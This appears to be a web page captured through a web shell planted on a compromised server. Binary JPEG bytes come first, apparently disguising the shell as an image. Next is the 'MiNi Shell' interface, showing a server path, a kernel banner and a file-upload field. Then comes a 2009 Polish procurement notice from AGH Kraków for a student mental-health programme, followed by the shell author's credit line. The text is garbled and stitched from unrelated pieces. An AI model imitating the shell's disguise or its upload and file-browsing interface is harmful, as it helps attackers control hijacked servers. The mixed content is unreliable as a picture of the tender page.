JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090514/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090514/148940-N-2009.html

<p class="kh_header"><b>Kraków: Opracowanie, realizacja oraz monitorowanie programu psychoedukacyjno-terapeutycznego dla studentów AGH ZP/0210/2009</b><br>
<b>Numer ogłoszenia: 148940 - 2009; data zamieszczenia: 14.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Akademia Górniczo - Hutnicza im. Stanisława Staszica , Al. Mickiewicza 30, 30-059 Kraków, woj. małopolskie, tel. 012 6173595, faks (012) 6173595, 6173363.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dzp.agh.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie, realizacja oraz monitorowanie programu psychoedukacyjno-terapeutycznego dla studentów AGH ZP/0210/2009.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opracowanie, realizacja oraz monitorowanie programu psychoedukacyjno-terapeutycznego dla studentów AGH ZP/0210/2009.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu wadium nie obowiązuje<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział wykonawcy nie wykluczeni na podstawie art. 24 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych (Dz. U. z dn.14 września 2006 r. Nr 164, poz.1163), spełniający warunki i wymagania określone w ogłoszeniu oraz w art. 22 ustawy Prawo zamówień publicznych.
Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy Prawo zamówień publicznych (posiadanie uprawnień do wykonywania: działalności w zakresie psychologicznej i psychoterapeutycznej, działalności szkoleniowej, do prowadzenia usług w zakresie kierowania działalnością instytucji zajmujących się ochroną zdrowia, edukacją, kulturą i innymi rodzajami działalności i na rzecz społeczeństwa, poza ubezpieczeniami społecznymi)
Wykonawca musi wykazać, że w ciągu ostatnich trzech lat, przed dniem wszczęcia postępowania a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, zrealizował, co najmniej 2 zamówienia odpowiadające swoim rodzajem przedmiotowi niniejszego postępowania. Za odpowiadające swoim rodzajem uważa się usługi takie jak: przygotowanie i prowadzenie szkoleń z przynajmniej 4 dziedzin lub w 4 zakresach opisanych w przedmiocie zamówienie, oraz prowadzenie grup terapeutycznych lub spotkań psychologów z młodzieżą, w szczególności w środowiskach studenckich. Wykonawca winien podać wartości zrealizowanych zamówień, daty ich wykonania oraz odbiorców, z załączeniem dokumentów potwierdzających, że prace te zostały wykonane należycie,
Wykonawca winien wykazać, że dysponuje pracownikami zdolnymi do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia
Wykonawca musi znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. 
Ocena spełnienia warunków dokonana zostanie wg formuły spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. W przypadku podmiotów wspólnie ubiegających się o udzielenie zamówienia (konsorcjum, spółka cywilna) obowiązuje załączenie pełnomocnictwa do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia lub do reprezentowania ich w postępowaniu oraz zawarcia umowy o udzielenie przedmiotowego zamówienia publicznego. Umocowanie może wynikać z treści umowy konsorcjum lub treści umowy s.c. 2. Oświadczenie z art. 22 ust. 1 o spełnieniu warunków udziału w postępowaniu 3. Wykaz wykonanych usług + dok. potwierdzające ich należyte wykonanie 4. Wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia 5. Polisa, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.6. Wniosek o dopuszczenie do udziału w postępowaniu..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> dialog konkurencyjny.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 10.</p><br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 70</li>
<li>2 - Zawartość merytoryczna ramowego programu - 30</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Brak na tym etapie SIWZ, pozostałe formularze dokumentów są dostępne www.dzp.agh.edu.pl.</p>
<p><b>IV.3.2) Opis potrzeb i wymagań zamawiającego określonych w sposób umożliwiający przygotowanie się wykonawców do udziału w dialogu konkurencyjnym lub informacja o sposobie uzyskania tego opisu:</b> AGH zleci do opracowania, realizacji oraz monitorowania program edukacyjno-terapeutyczny dla studentów AGH, mający na celu dbanie o zdrowie psychiczne młodzieży akademickiej w aspekcie procesów adaptacyjnych na pierwszych latach studiów wyższych oraz zmiany stylu życia w społeczności akademickiej.
Zasadnicze cele stawiane przed programem edukacyjno- terapeutycznym :
1. wdrożenie modelu zintegrowanej opieki psychologicznej;
2. stworzenie programu psychoedukacyjnego na temat zdrowia psychicznego, adaptacji i zmiany stylu życia (przygotowanie cyklu wykładów, warsztatów, punktów konsultacyjnych, broszur informacyjnych, plakatów, strony www  itp.);
3. przeprowadzenie wykładów z zarządzania czasem i finansami w ramach życia akademickiego;
4.promowanie wzajemnej pomocy poprzez edukację, poradnictwo, inne formy pomocy psychologiczno-teraputycznej;
5. realizacja specjalistycznych programów opieki psychologicznej i zdrowia psychicznego,
6. rozwijanie efektywnych form współpracy ( student-student, student wykładowca)
7. konsultacje drogą elektroniczną
8. promocja programu w trakcie jego realizacji 
9. analiza potrzeb studentów w zakresie potrzeb w obszarach: zdrowotnym, społecznym, psychologicznym:
a)do obszaru zdrowotnego należą działania tj.: wczesne rozpoznawanie, informacja o zaburzeniach i leczeniu, wsparcie psychologiczne,
b)do obszaru psychologicznego należy: wsparcie psychoedukacyjne, emocjonalne, informacyjne, opieka długoterminowa,
c)do obszaru społecznego należy: wyrabianie umiejętności opieki nad drugą osobą, umacnianie relacji międzyludzkich, wsparcie w sytuacjach kryzysowych, tworzenie sieciowego systemy wsparcia z udziałem rodzin, pełne uczestnictwo społeczne, unikanie stygmatyzacji i dyskryminacji, przestrzeganie praw człowieka.

We wszystkich tych obszarach niezbędne jest podejmowanie wielokierunkowych działań, których zintegrowany charakter stanowi główną przesłankę sukcesu w wymiarze edukacyjnym.
10. Główny nacisk powinien objąć rozwiązanie problemów przystosowania do:
a)nowego trybu nauki (samodyscypliny), 
b)nowego trybu życia studenckiego (w tym mieszkania w domach studenckich), 
c)prowadzenia własnego gospodarstwa (związanego z wyjściem z domu rodzinnego), 
11.Należy stworzyć punkt konsultacji psychologicznej ( Kampus centralny,akademik),
12.Należy stworzyć program informacyjny,
13.Należy stworzyć warunki do monitorowania, analizowania i raportowania:
a)stanu zdrowia psychicznego studentów, jak i 
b)dostępności do adekwatnych świadczeń zdrowotnych, 
c)procesów społecznych (akademickich),
d)przyczyn zaburzeń zachowania, adaptacji w nowym środowisku,
e)najczęstszych problemów dotykających społeczność akademicką,
f)problem używek w środowisku studenckich (alkohol, narkotyki)
g)adaptacji studentów pochodzących z obszarów wiejskich i zmarginalizowanych
14.Nastąpić powinna integracja działań: ochrony zdrowia, pomocy psychologicznej, społecznej,
15.Niezbędne jest podjęcie działań informacyjno-edukacyjnych w tym promujących postawy odpowiedzialności za swoje czyny lub zaniedbania,
16.Należy zapewnić dostęp do odpowiednich i efektywnych pod względem kosztowym, usług obejmujących promocję zdrowia, profilaktykę schorzeń i zaburzeń,
17.Należy promować odpowiednie postawy studenckie i sposoby redukcji czynników ryzyka,
18.Należy przedsięwziąć działania służące zwalczaniu negatywnych postaw i zachowań, promowaniu integracji poprzez partnerstwo pomiędzy wszystkimi uczestnikami życia akademickiego (studenci, wykładowcy).</p><p><b>IV.3.3) Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:</b> Zamawiający nie przewiduje nagrody..</p><p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.05.2009 godzina 12:00, miejsce: Siedziba zamawiającego - paw. C-2, pok.117
Al. Mickiewicza 30, 30-059 Kraków.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com